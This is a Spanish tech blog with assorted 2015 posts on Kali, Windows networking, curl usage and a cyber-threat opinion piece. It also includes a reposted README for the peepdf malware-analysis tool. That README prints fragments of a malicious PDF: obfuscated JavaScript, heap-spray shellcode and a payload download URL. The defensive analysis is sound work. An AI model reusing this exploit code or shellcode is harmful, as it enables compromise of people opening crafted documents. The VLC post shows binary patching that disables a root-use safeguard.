martes, 13 de octubre de 2015

SE GANA POR LO QUE SE SABE, NO POR LO QUE SE HACE

0 comentarios
Un ingeniero que fue llamado a arreglar una computadora muy grande y extremadamente compleja... una computadora que valía 12 millones de dólares. Sentado frente a la pantalla, oprimió unas cuantas teclas, asintió con la cabeza, murmuró algo para sí mismo y apagó el aparato. Procedió a sacar un pequeño destornillador de su bolsillo y dio vuelta y media a un minúsculo tornillo. Entonces encendió de nuevo la computadora y comprobó que estaba trabajando perfectamente.

El presidente de la compañía se mostró encantado y se ofreció a pagar la cuenta en el acto.

- ¿Cuánto le debo? preguntó.

- Son mil dólares, si me hace el favor.

- ¿Mil dólares? ¿Mil dólares por unos momentos de trabajo?

¿Mil dólares por apretar un simple tornillito? ¡Ya sé que mi computadora cuesta 12 millones de dólares, pero mil dólares es una cantidad disparatada! Le pagaré sólo si me manda una factura perfectamente detallada que la justifique.

El ingeniero asintió con la cabeza y se fue.

A la mañana siguiente, el presidente recibió la factura, la leyó con cuidado, sacudió la cabeza y procedió a pagarla en el acto, sin chistar.

La factura decía:

Servicios prestados:

Apretar un tornillo............ US $1 dólar

Saber qué tornillo apretar.... US $999 dólares

Para todos aquellos profesionales que día a día se enfrentan con la desconsideración de quienes por su propia ignorancia no alcanzan a entenderlos.

RECUERDA: "SE GANA POR LO QUE SE SABE, NO POR LO QUE SE HACE".
Read more ►

viernes, 18 de septiembre de 2015

Ejecutar VLC con privilegios de ROOT en KALI

3 comentarios
Cuenta la leyenda que hay videotutoriales que deseo verlos después nuevamente y por lo tanto los guardo en mi equipo...

Uso Kali Linux y me es incómodo estar trabajando como usuario sin privilegios, así que dichos videos los estaba reproduciendo con total normalidad con el reproductor VLC. Hace poco hice update/upgrade al sistema y "misteriosamente" ya no pude reproducir videos siendo root.

Doble clic sobre los ficheros de video y nada, así que abrí una línea de comandos, escribí vlc y me aparecía este mensaje:

VLC is not supposed to be run as root. Sorry.
If you need to use real-time priorities and/or privileged TCP ports
you can use /usr/bin/vlc-wrapper (make sure it is Set-UID root first and
cannot be run by non-trusted users first).


Fue extraño porque antes los reproducía con total normalidad, así que al googlear un poco me encontré con una respuesta muy reciente del foro de los usuarios de Kali.

Para solucionar esta necesidad, hay que instalar un editor hexadecimal (yo lo hice con uno llamado Ghex), y reemplazar una palabra.

Después de hacer el respectivo apt-get update && apt-get install ghex lo ejecuté desde la terminal invocanco al binario de VLC:

root@kali: ~# ghex /usr/bun/vlc

Y aparecerá ghex con el binario de vlc cargado en formato hexadecimal (en el menú gráfico ghex se encuentra dentro de Aplicaciones --> Programación. Una vez abierto hay que navegar hasta el binario de vlc, y por lo que se me hace tedioso, es más fácil hacerlo desde la línea de comandos, y lo útil que es la tecla Tab para autocompletar las rutas). Se tiene que ir al menú Edit y luego seleccionar Replace:



Buscamos la palabra geteuid y la reemplazamos por getppid, clic en el botón replace all y listo. Se cierra la ventana de búsqueda con el botón "Cancel" y lo editado uedará de la siguiente forma:



Se presiona la combinación de teclas "Ctrl" + "s" para guardar, y ya se puede hacer uso de VLC como usuario root.

Espero que a alguien mas le sea de utilidad.

Fuente: Foro de Usuarios Kali Linux.
Read more ►

martes, 11 de agosto de 2015

What is the difference between Swapping and Paging

0 comentarios

Swapping:
Whole process is moved from the swap device to the main memory for execution. Process size must be less than or equal to the available main memory. It is easier to implementation and overhead to the system. Swapping systems does not handle the memory more flexibly as compared to the paging systems.

 Paging:
Only the required memory pages are moved to main memory from the swap device for execution. Process size does not matter. Gives the concept of the virtual memory. It provides greater flexibility in mapping the virtual address space into the physical memory of the machine. Allows more number of processes to fit in the main memory simultaneously. Allows the greater process size than the available physical memory. Demand paging systems handle the memory more flexibly.
Read more ►

miércoles, 24 de junio de 2015

Donde se encuentra ubicado el plugin de flashplayer para Iceweasel en kali linux

0 comentarios
¿Dónde está ubicado el plugin de flashplayer (libflashplayer.so) para Iceweasel en kali linux?

Where is located the flashplayer plugin (libflashplayer.so) for Iceweasel in kali linux:


Aquí / Here:

/usr/lib/mozilla/plugins/
Read more ►

domingo, 21 de junio de 2015

Assange, Snowden y Usted

0 comentarios
MOISES NAIM

Son más preocupantes las amenazas cibernéticas que emanan de Rusia y China que las que provienen de Washington.

WikiLeaks ha vuelto a sus andanzas. Acaba de anunciar la divulgación de medio millón de mensajes y otros documentos secretos del Ministerio de Asuntos Exteriores de Arabia Saudita, entre ellos correos intercambiados con otros gobiernos, y también informes confidenciales de Ministerio del Interior y de los servicios de inteligencia.

En su comunicado, Wikileaks recuerda que esta publicación coincide con el tercer aniversario de la reclusión de su fundador, Julian Assange, en la embajada de Ecuador en Londres. Assange se asiló para evitar ser extraditado a Suecia, donde se enfrenta a un juicio por supuesta violación y abuso sexual de dos mujeres (Assange rechaza las acusaciones).

Otro que está de aniversario es Edward Snowden, el contratista de la CIA que divulgó una montaña de información secreta de Estados Unidos. Hace días se cumplieron dos años de estas revelaciones y Snowden ha publicado un artículo en The New York Times, celebrando sus logros. En él, recuerda que, gracias a sus filtraciones, se produjo un intenso debate que forzó al gobierno norteamericano a poner límites al espionaje electrónico indiscriminado que rutinariamente efectuaba su Agencia Nacional de Seguridad, la NSA.

Desde 2013, instituciones de toda Europa han declarado ilegales este tipo de operaciones y han impuesto restricciones a actividades similares en el futuro, asegura Snowden, y concluye así: “Somos testigos del nacimiento de una generación post-terror que rechaza una visión del mundo definida por una tragedia específica. Por primera vez desde los ataques del 11-S, vemos la posibilidad de que la política se aleje de la reacción y el miedo y se mueva hacia la resiliencia y la razón”.

Puede ser. Y celebro que la NSA y otros espías estadounidenses ahora tengan más restricciones para leer mi correo electrónico o saber con quién me comunico. Y que la lucha por proteger mi privacidad de las intromisiones del gobierno de Estados Unidos y de algunas democracias europeas se haya anotado algunas victorias. Pero me preocupan más las amenazas cibernéticas a mi privacidad que emanan de Rusia, China y otros regímenes autoritarios que las que vienen de Washington.

En los mismos días en que Snowden publicó su artículo, se supo que piratas cibernéticos penetraron en los sistemas de la oficina de personal del gobierno de Estados Unidos y robaron información detallada de al menos cuatro millones de empleados federales. Los archivos robados incluyen datos personales y profesionales que los funcionarios están obligados a revelar para tener acceso a la información confidencial de la Administración.

El principal sospechoso de este ataque es China. Según un reportaje de The Washington Post, “China está construyendo una base de datos masiva con información privada de los estadounidenses a base de hackear los archivos electrónicos de agencias gubernamentales y empresas aseguradoras de salud. Utiliza nuevas tecnologías para alcanzar un antiguo objetivo del espionaje: reclutar espías y obtener mayor información sobre su adversario”.

Pero los ataques no se limitan al espionaje ni, necesariamente, tienen un gobierno detrás. También hay muchos piratas independientes que se ganan la vida con la actividad criminal en Internet. Así, han proliferado los robos de secretos comerciales, la suplantación de identidad, la extorsión o el sabotaje de infraestructuras esenciales. “Nuestro sistema de información es atacado varias veces al día, todos los días”, me dijo el presidente de una de las principales empresas de electricidad del mundo. Y añadió: “Hoy gastamos 10 veces más en protegernos de ataques cibernéticos de lo que gastábamos hace tres años. Y aún así sentimos que siempre estamos por detrás de quienes nos tienen en la mira”.

Según el respetado informe que todos los años publica la empresa Verizon, los ataques cibernéticos a Estados Unidos están creciendo a gran velocidad y hay pocos sectores cuyas defensas informáticas no hayan sido violadas. Las principales víctimas son el gobierno, el sector de la salud (hospitales y empresas aseguradoras) y el financiero. Los expertos enfatizan que si bien los ciberataques originados en China son constantes y masivos, los que provienen de Rusia no tienen nada que envidiarles en cuanto a agresividad, frecuencia y sofisticación. Y seguramente Estados Unidos no se queda atrás.

Pero no hay que ponerlos a todos en la misma canasta. Estados Unidos es una democracia. Con todos sus defectos, hay separación de poderes y los gobernantes no gozan de la impunidad de sus colegas en Moscú o Pekín. Y sus redes criminales no operan internacionalmente amparadas por sus cómplices en las altas instancias. Sí; es importante que las democracias no espíen a sus ciudadanos, pero aún más importante es que tengan con qué defenderse y defenderlos del peligroso mundo cibernético que está emergiendo. No es por casualidad que ni en Rusia ni en China hayan aparecido los equivalentes de Assange y Snowden.

Fuente: elpais.com
Read more ►

viernes, 12 de junio de 2015

Instalar Ninja-IDE en Kali / Debian

0 comentarios
Siempre ando trasteando un poco con Python y quiero probar un IDE que sea ligero y que tenga algo básico como Debugging, Completion, corrector de PEP8 y remarcado de la sintaxis.

Decidí probar Ninja-IDE, está disponible para varias plataformas, es OpenSource liberado bajo la Licencia GPLv3, liviano, y tiene lo que ando buscando.

Quiero instalarlo en Kali, para ello está disponible a la fecha un .deb para su instalación con dpkg --install pero este .deb depende de otro paquete que no se encuentra instalado de forma predeterminada, así que cuando intenté instalarlo tuve este mensaje:

dpkg --install ninja-ide_2.3+r597~saucy1_all.deb
Seleccionando el paquete ninja-ide previamente no seleccionado.
(Leyendo la base de datos ... 390889 ficheros o directorios instalados actualmente.)
Desempaquetando ninja-ide (de ninja-ide_2.3+r597~saucy1_all.deb) ...
dpkg: problemas de dependencias impiden la configuración de ninja-ide:
 ninja-ide depende de python-pyinotify; sin embargo:
  El paquete `python-pyinotify' no está instalado.

dpkg: error al procesar ninja-ide (--install):
 problemas de dependencias - se deja sin configurar
Procesando disparadores para desktop-file-utils ...
Procesando disparadores para gnome-menus ...
Procesando disparadores para menu ...
Procesando disparadores para man-db ...
Se encontraron errores al procesar:
ninja-ide


Para proseguir con la instalación de Ninja-IDE basta con hacer:
apt-get install python-pyinotify

Luego se vuelve a ejecutar:
dpkg --install ninja-ide_2.3+r597~saucy1_all.deb

Lo que viene seguido de un proceso normal de instalación:
(Leyendo la base de datos ... 391728 ficheros o directorios instalados actualmente.)
Preparando para reemplazar ninja-ide 2.3+r597~saucy1 (usando ninja-ide_2.3+r597~saucy1_all.deb) ...
Desempaquetando el reemplazo de ninja-ide ...
Configurando ninja-ide (2.3+r597~saucy1) ...
Procesando disparadores para desktop-file-utils ...
Procesando disparadores para gnome-menus ...
Procesando disparadores para menu ...
Procesando disparadores para man-db ...


Y se tiene Ninja-IDE instalado en nuestro GNU/Linux Debian o Kali.

Bytes.
Read more ►

jueves, 11 de junio de 2015

Como instalar un mini-puerto virtual wifi de microsoft

0 comentarios
El adaptador Virtual Wi-Fi Miniport (minipuerto virtual Wi-Fi de Microsoft) crea un duplicado virtual del adaptador de red inalámbrica instalado en la computadora. Este se activa automáticamente cuando la de red inalámbrica se agrega a Windows 7, pero los pueden desinstalar y eliminar el adaptador de la computadora en cualquier momento. Si la computadora viene con Windows 7 y un adaptador de red inalámbrico, pero no se puede encontrar el adaptador Virtual Wi-Fi Miniport en el Administrador del , puedes volver a instalar el software del dispositivo desde la línea de comandos.

Instrucciones

  1. Haz clic en "Inicio". Escribe "cmd.exe" en el cuadro de búsqueda y presiona "Enter" para abrir el símbolo del sistema.

  2. Escribe "netsh wlan set hostednetwork mode=allow" en la línea de comandos, a continuación, pulsa "Enter" para instalar el adaptador Virtual Wi-Fi Miniport a la computadora.

  3. Haz clic en "Inicio". Escribe "devmgmt.msc" en el cuadro de búsqueda y presiona "Enter" para abrir el Administrador de dispositivos.

  4. Amplia "Adaptadores de red" para confirmar que el "Adaptador Microsoft Virtual Wi-Fi Miniport " está en la lista.
 Para iniciar una red alojada en el adaptador Wi-Fi, conéctate con el punto de acceso inalámbrico, a continuación, introduce "netsh wlan start hostednetwork" en el indicador de la línea de comandos.

Enlace del artículo!
Read more ►

miércoles, 10 de junio de 2015

Quickfix de problema con Winsock en Windows 7

0 comentarios
Estaba revisando una minilaptop HP, y uno de los problemas era que la interfaz de red inalámbrica aparecía como apagada desde el inicio de Windows. Instalé nuevamente el "HP Connection Manager" y el problema persistía. Después de tanto probar tuve la idea de desisntalarlo completamente y así se resolvió el inconveniente con este programa. La interfaz de red inalámbrica queda encendida desde el inicio de Windows.

Debido al programete Connection Manager de HP no podía conectarme a alguna red, ni por WiFi ni por medio de uno de esos modem-usb. En fin, problema resuelto.

Con la interfaz de red en funcionamiento, me pude pegar a la red inalámbrica sin embargo no podía hacer ping a cualquier sitio de internet, solamente a hosts en la misma wlan, por lo que después de buscar y buscar por qué no había ping hacia el mundo exterior tuve que recurrir hacer un reset del protocolo WinSock.

Sabía que para Win-XP había un programa, pero para ese equipo con Win7 ya no se hacía con programitas externos sino con comandos, así que después de buscar un poco encontré la solución, la cual comparto a continuación:

1. Ejecutar una línea de comandos con privilegios elevados (administrativos), eso se hace [mi método en particular] presionando la tecla de Windows, luego hacer una búsqueda del ejecutable de la línea de comandos (cmd.exe). Bastará con empezar a escribir cmd y sin presionar enter/intro hacer clic derecho sobre la sugerencia y seleccionar "Ejecutar como Administrador". Una vez hecho eso, se verá que el prompt del cmd en lugar de aparecer en la ruta normal del usuario aparece en "C:\Windows\System32", eso significa que se tienen privilegios elevados o administrativos en esa shell.

2. Digitar netsh winsock reset luego presionar la tecla Enter/Intro

3. El siguiente mensaje debería aparecer justo después de la ejecución del comando: "Successfully reset the Winsock Catalog. You must restart the computer in order to complete the reset." o su equivalente en español "Reinicio satisfactorio del catálogo de Winsock. Debe reiniciar su ordenador para completar el reinicio."

4. Reiniciar el equipo.

Para mí fue suficiente ejecutar esta orden en la línea de comandos con privilegios elevados, en el sitio de donde extraje la información (en inglés) comenta que hay otro comando con el cual probar, sin embargo a mí me fucionó este al primer intento y espero que a otro usuario de habla hispana también le pueda ser útil esta ayuda.

Otro enlace con ayuda rápida para problemas de red en Windows, hacer clic "aquí".

Bytes.
Read more ►

domingo, 7 de junio de 2015

Activar o Desactivar Virtual WiFi Miniport Adapter

0 comentarios
El Microsoft Virtual WiFi Miniport Adapter es una nueva característica de Win7 que permite conectrse a más de una red Wi-fi simultáneamente. Viene con Win7,Para desinstalar el Microsoft Virtual WiFi Miniport Adapter

Entrar en CMD

- Netsh wlan
- netsh wlan stop hostednetwork
- netsh wlan set hostednetwork mode=disallow


Y si necesitamos volver a habilitarlo, hacemos esto:

- netsh wlan set hostednetwork mode=allow
- netsh wlan start hostednetwork
-Puedes desinstalarlo si quieres no lo necesitas..saludos..
Read more ►

martes, 2 de junio de 2015

PeePDF a PDF analysis tool (from eternal-todo.com)

1 comentarios

peepdf - PDF Analysis Tool


 =======================================


What is this?


peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of PyV8 and Pylibemu it provides Javascript and shellcode analysis wrappers too. Apart of this it is able to create new PDF files, modify existent ones and obfuscate them.


Usage



Usage: ./peepdf.py [options] PDF_file

Options:
  -h, --help            show this help message and exit
  -i, --interactive     Sets console mode.
  -s SCRIPTFILE, --load-script=SCRIPTFILE
                        Loads the commands stored in the specified file and
                        execute them.
  -c, --check-vt        Checks the hash of the PDF file on VirusTotal.
  -f, --force-mode      Sets force parsing mode to ignore errors.
  -l, --loose-mode      Sets loose parsing mode to catch malformed objects.
  -m, --manual-analysis
                        Avoids automatic Javascript analysis. Useful with
                        eternal loops like heap spraying.
  -u, --update          Updates peepdf with the latest files from the
                        repository.
  -g, --grinch-mode     Avoids colorized output in the interactive console.
  -v, --version         Shows program's version number.
  -x, --xml             Shows the document information in XML format.


$ ./peepdf.py -i


PPDF> help

Documented commands (type help <topic>):
========================================
bytes           errors       js_eval           open          sctest    
changelog       exit         js_join           quit          search    
create          filters      js_unescape       rawobject     set       
decode          hash         log               rawstream     show      
decrypt         help         malformed_output  references    stream    
embed           info         metadata          replace       tree      
encode          js_analyse   modify            reset         vtcheck   
encode_strings  js_beautify  object            save          xor       
encrypt         js_code      offsets           save_version  xor_search  


How does it work?


  •  How can I execute the tool?
   The basic syntax is:
$ ./peepdf.py pdf_file
  
   But you can use the -f option to avoid errors and to force the tool to ignore them:
$ ./peepdf.py fcexploit.pdf
Error: Missing /Length in stream object!

$ ./peepdf.py -f fcexploit.pdf
 
File: fcexploit.pdf
MD5: 659cf4c6baa87b082227540047538c2a
SHA1: a93bf00077e761152d4ff8a695c423d14c9a66c9
Size: 25169 bytes
Version: 1.3
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 18
Streams: 5
Comments: 0
Errors: 1

Version 0:
 Catalog: 27
 Info: 11
 Objects (18): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 22, 23, 24, 25, 26, 27, 28]
  Errors (2): [11, 25]
 Streams (5): [5, 7, 9, 10, 11]
  Encoded (4): [5, 7, 9, 10]
 Objects with JS code (1): [5]
 Suspicious elements:
  /OpenAction: [1]
  /JS: [4]
  /JavaScript: [4]
  getAnnots (CVE-2009-1492): [5]    

That's the default output, if you really want to explore and play with the PDF file use the interactive console (-i). These are some of the common commands:
 
  • The tree command shows the logical structure of the file:
     
PPDF> tree

/Catalog (1)
 /Fields (5)
 array (2)
 /JavaScript (7)
  /Names (10)
   /Action /JavaScript (12)
    stream (13)
 /Pages (4)
  /Page (9)
   /Pages (4)
   stream (11)
   /ProcSet (8)
  /ProcSet (8)
 /Outlines (3)
 dictionary (6)
/Info (14)


  • To view the physical structure of the file you will have to use the offsets command:

PPDF> offsets

       0 Header
      17
        Object  1 (260)
     276
     279
        Object  2 (19)
     297
     300
        Object  3 (48)
     347
     350
        Object  4 (78)
     427
     430
        Object  5 (33)
     462
     465
        Object  6 (21)
     485
     488
        Object  7 (41)
     528
     531
        Object  8 (68)
     598
     601
        Object  9 (187)
     787
     790
        Object  10 (52)
     841
     844
        Object  11 (85)
     928
     931
        Object  12 (50)
     980
     983
        Object  13 (1823)
    2805
    2808
        Object  14 (204)
    3011
    3014
        Xref Section (325)
    3338
    3341
        Trailer (69)
    3409
    3410 EOF


  • With the metadata command you can see the metadata information in each version of the document:

PPDF> metadata

Info Object in version 0:

/Title 
/ModDate 2008312053854
/CreationDate 2008312053854
/Producer Scribus PDF Library 1.3.3.12
/Trapped /False
/Creator Scribus 1.3.3.12
/Keywords 
/Author 

  • The command rawobject shows the different objects without decodings, while the object command shows the content after the decoding process:

PPDF> object 1

/AcroForm 5 0 R
/Threads 2 0 R
/Names 7 0 R
/OpenAction <</S /JavaScript
/JS (this.uSQXcfcd2())>>
/Pages 4 0 R
/Outlines 3 0 R
/Type /Catalog
/PageLayout /SinglePage
/Dests 6 0 R
/ViewerPreferences <</PageDirection /L2R>>

PPDF> rawobject 1

1 0 obj
<< /#41#63#72#6f#46#6f#72#6d 5 0 R
/#54#68#72#65#61#64#73 2 0 R
/#56#69#65#77#65#72#50#72#65#66#65#72#65#6e#63#65#73  << /#50#61#67#65#44#69#72#65#63#74#69#6f#6e /#4c#32#52 >>
/#4f#70#65#6e#41#63#74#69#6f#6e << /#53 /#4a#61#76#61#53#63#72#69#70#74
/#4a#53 (\164\150\151\163\056\165\123\121\130\143\146\143\144\062\050\051) >>
/#50#61#67#65#73 4 0 R
/#4f#75#74#6c#69#6e#65#73 3 0 R
/#54#79#70#65 /#43#61#74#61#6c#6f#67
/#50#61#67#65#4c#61#79#6f#75#74 /#53#69#6e#67#6c#65#50#61#67#65
/#44#65#73#74#73 6 0 R
/#4e#61#6d#65#73 7 0 R >>
endobj

  • The same idea is used with the streams:

PPDF> stream 13

function nofaq(lgc){var ppwsd="";for(rxr=0;rxr<lgc.length;rxr+=2){ppwsd+=(String.fromCharCode(parseInt(lgc.substr(rxr,5),19)));}eval(ppwsd);}nofaq("0D0A6452601D6 24C2B445F493F671D341D5F56651D38606052672223320D0A57635F54625A5G5F1D5D46494B3A223C2H30673 9261D42446438644523690D0A1D1D65595A5D561D223C2H306739285D565F5862591D241D2C1D331D4244643 8644523690D0A1D1D1D1D3C2H3067391D25341D3C2H306739320D0A1D1D6B0D0A1D1D3C2H3067391D341D3C2 H306739286163536162605A5F58222A261D4244643864451D291D2C23320D0A1D1D60566263605F1D3C2H306 739320D0A6B0D0A57635F54625A5G5F1D4D4A4D5G594E485522533956493F5823690D0A6452601D424840642 H39441D341D2A662A542A542A542A54320D0A1D1D1D1D1D1D605H5A574A58571D341D635F566154525H56221 F1I632E2D2E2D1I632E2D2E2D1I632A5756531I632D2D2F531I632G2G54301I632I2A53301I632I2A2A2B1I6 356572D2D1F1D250D0A1F1I63562C2E2D1I63565357521I63562I2A2F1I63575756541I63575757571I632I5 32H571I6355572E561I63565756571I632G2E56571I63562D52571I6330572G2E1I632E26161 ...      

PPDF> rawstream 13

78 9c 95 58 5b 4f dd 46 10 fe 2b 11 4f 1c 25 8a   |x..X[O.F..+.O.%.|
ec d9 8b 6d 51 1e 7c 39 6b fb b9 bf 80 a6 40 a2   |...mQ.|9k.....@.|
a6 d0 02 49 95 46 fd ef fd 66 af 5e db e7 90 c8   |...I.F...f.^....|
02 96 f5 ec 37 f7 99 1d df 7d 79 f8 f0 f2 e9 f1   |....7....}y.....|
e1 cd c3 e3 dd cd df 97 9f ef 3f 1c be 7f bd 79   |..........?...y|
7a f3 fc cf b7 6f 7f 5c 5f 5c 5c dd 3d 3e 5d be   |z....o\_\\.=>].|
fc fb 72 5d 5c e1 f7 2f 78 ff fe f3 ed c3 fd cb   |..r]\../x.......|
47 fe f7 ed 35 1d be 5b ca b7 d7 97 bf be 3c 7d   |G...5..[......<}|
...

  • Other useful command is references, very helpful to know where an object is referenced and the references in an object:

PPDF> references to 12

[10]

PPDF> rawobject 10

10 0 obj
<</Names [(New_Script) 12 0 R]
>>
endobj

PPDF> references in 12

['13 0 R']

  • If there are some objects with Javascript code in their content you can use the JS commands (PyV8 required) to analyze them (js_eval, js_join, js_unescape, js_analyse):

PPDF> js_analyse object 13

Javascript code:


var tX1PnUHy = new Array();
function lRUWC(E79yB, NPvAvQ){
  while (E79yB.length * 2 < NPvAvQ){
    E79yB += E79yB;
  }
  E79yB = E79yB.substring(0, NPvAvQ / 2);
  return E79yB;
}
function YVYohZTd(bBeUHg){
var NTLv7BP = 0x0c0c0c0c;
rpifVgf = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64"+ "%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787"+ "%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3"+ "%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66"+ "%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef"+ "%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64"+ "%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf..."

Unescaped bytes:
43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef   |CCCC..[3.f....3.|
43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef   |C..........N...|
ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef   |.d..d..Bd..n....|
ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa   |.d...a........f.|
eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9   |...w.e......f...|
87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00   |.._.-.....f.....|
21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a   |!...;...f.......|
57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66   |W.)...f...o.,..f|
aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee   |........f..d....|
b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f   |.d....d.........|
07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf   |.x...f..d*l/.f..|
87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07   |......d.....d...|
8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb   |.......(.....(..|
97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7   |.......d.....d..|
07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10   |............4...|
9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef   |....d.....d.....|
ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7   |.......d.....d..|
07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7   |.......d.....d..|
07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e   |................|
6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64   |l....d5......d.d|
92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9   |..d...d..d......|
64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0   |d.....&..B.,....|
51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11   |Q......!........|
b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64   |....d.d...2.d..d|
b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b   |...2d.d.*..-....|
11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f   |..........http:/|
2f 62 69 6b 70 61 6b 6f 63 2e 63 6e 2f 6e 75 63   |/bikpakoc.cn/nuc|
2f 65 78 65 2e 70 68 70                           |/exe.php|


URLs in shellcode:
 http://bikpakoc.cn/nuc/exe.php

Index

More info


You can take a look at the Wiki of the project: installation, execution and all the commands explained.
Read more ►

cURL como

0 comentarios

[cURL Howto]


Puedes utilizar la librería cURL y el comando curl para diseñar tu propia Petición y explorar la Respuesta. Hay muchos usos posibles, como por ejemplo, una API de depuración, para realizar web hacking o pen testing, entre los usos más creativos.

curl es una herramienta para transferir datos desde o hacia un servidor, utilizando uno de los protocolos soportados (por ejemplo, FTP, GOPHER, HTTP, HTTPS, IMAP, LDAP, POP3, RTMP, SCP, SFTP, SMTP, TELNET). El comando está diseñado para funcionar sin interacción por parte del usuario.

curl ofrece una amplia cantidad de trucos útiles tales como soporte de proxy, autenticación de usuario, subida a FTP, anunciar peticiones HTTP, conexiones SSL, cookies, continuar o resumir transferencia de ficheros, Metalink, y mucho mas. Como podrás ver abajo, el número de características hará que te de vueltas la cabeza!

Por lo tanto, curl es verdaderamente un comando poderoso, sin embargo esto lo hace a un costo de complejidad. Aquí mostraré algunos de los casos de uso del mundo real.

 

La URL

La sintaxis de la URL es independiente del protocolo. Si especificas una URL sin el prefijo del protocolo ( protocolo:// ), curl intentará adivinar cual es el protocolo que quieres utilizar. Intentará utilizar el protocolo determinado HTTP pero también intentará en otros protocolos basados en prefijos de nombres usados frecuentemente. Por ejemplo, para un host que el nombre inicie con “ftp.”  curl asumirá que quieres hablar el lenguaje usado en FTP.

Puedes especificar multiples URLs o parte de ellas escribiendo unas partes de ellas dentro de llaves, como por ejemplo:
curl en.wikipedia.org/wiki/{FTP,SCP,TELNET}

Tambien puedes establecer seuencias de series alfanuméricas utilizando corchetes [ ] como en estos ejemplos:
curl forums.example.com/showthread.php?t=[1758900-1758913]

curl numeros.com/file[1-100].txt
curl numeros.com/file[001-100].txt
curl letras.com/file[a-z].txt

No se soportan secuencias anidadas, pero puede utilizar cuantas quieras una después de otra:
curl cualquiersitio.org/file[2010-2015]/vol[1-5]/parte{a,b,c}.html

Se puede especificar cualquier cantidad de URLs en la línea de comandos. Éstas serán ejecutadas en una manera secuencial en el orden especificado.

Se puede espedificar un contador de pasos de avance para los rangos para obtener cada Nth posiciones de números o letras:
curl numeros.com/file[1-100:10].txt
curl letras.com/file[a-z:2].txt

Rastrear el volcado [Trace Dump]

Para analizar en profundidad qué es lo que enviamos y qué es lo que recibimos, podríamos guardar absolutamente todo en un fichero, esto es tan facil como digitar en la línea de comandos:
curl --trace-ascii VolcadoDeDepuracion.txt URL

 Guardar a Disco

Si se quiere guardar las Respuestas al disco se puede utlizar la opción -o <fichero>. Si se están utilizando {} or [] para ejecutar múltiples documentos, se puede utlizar ‘#‘ seguido por un número en el especificador. Esa variable será reemplazada con la cadena actual para la URL que esté siendo ejecutada en ese instante. Recuerda proteger la URL en la línea de comandos añadiendo comillas dobles si se recibe el mensaje de error:
internal error: invalid pattern type (0).

Ejemplos:
curl 'es.wikipedia.org/{FTP,TFTP,SFTP}' -o "#1.html"
curl arxiv.org/pdf/13[01-11].36[00-75].pdf -o "arXiv13#1.36#2.pdf"

La opción -O escribe la salida a un fichero local llamado como el fichero remoto que queremos obtener (solamente se utiliza la parte del nombre del fichero remoto, la parte de la ruta del fichero es eliminada). Se usa solamente el nombre del fichero remoto para guardar lo que se ha extraído de la URL proporcionada, nada mas.

Consecuentemente, el fichero será guardado en el directorio actual en el que se está trabajando (desde donde decidió ejecutar curl en la línea de comandos. Si se quiere guardar el fichero en un directorio distinto, asegúrese de cambiarse al directorio adecuado antes de invocar curl :
curl -O arxiv.org/pdf/1301.3600.pdf

Solamente la parte del fichero remoto es utilizado, por lo tanto, el fichero será guardado como 1301.3600.pdf.

Establecer el método de Petición HTTP

El método HTTP predeterminado de  curl, GET, puede ser establecido a cualquier método que se necesite utilizando la opción -X <command>. Las figuras principales en esto, POST, PUT, DELETE, y aún los métodos personalizados, pueden ser especificados:
curl -X POST echo.httpkit.com

Normalmente no se necesitará esta opción. Todos los tipos de peticiones como GET, HEAD, POST y PUT más bien son invocados mediante el uso de las opciones de la línea de comandos.

Formularios

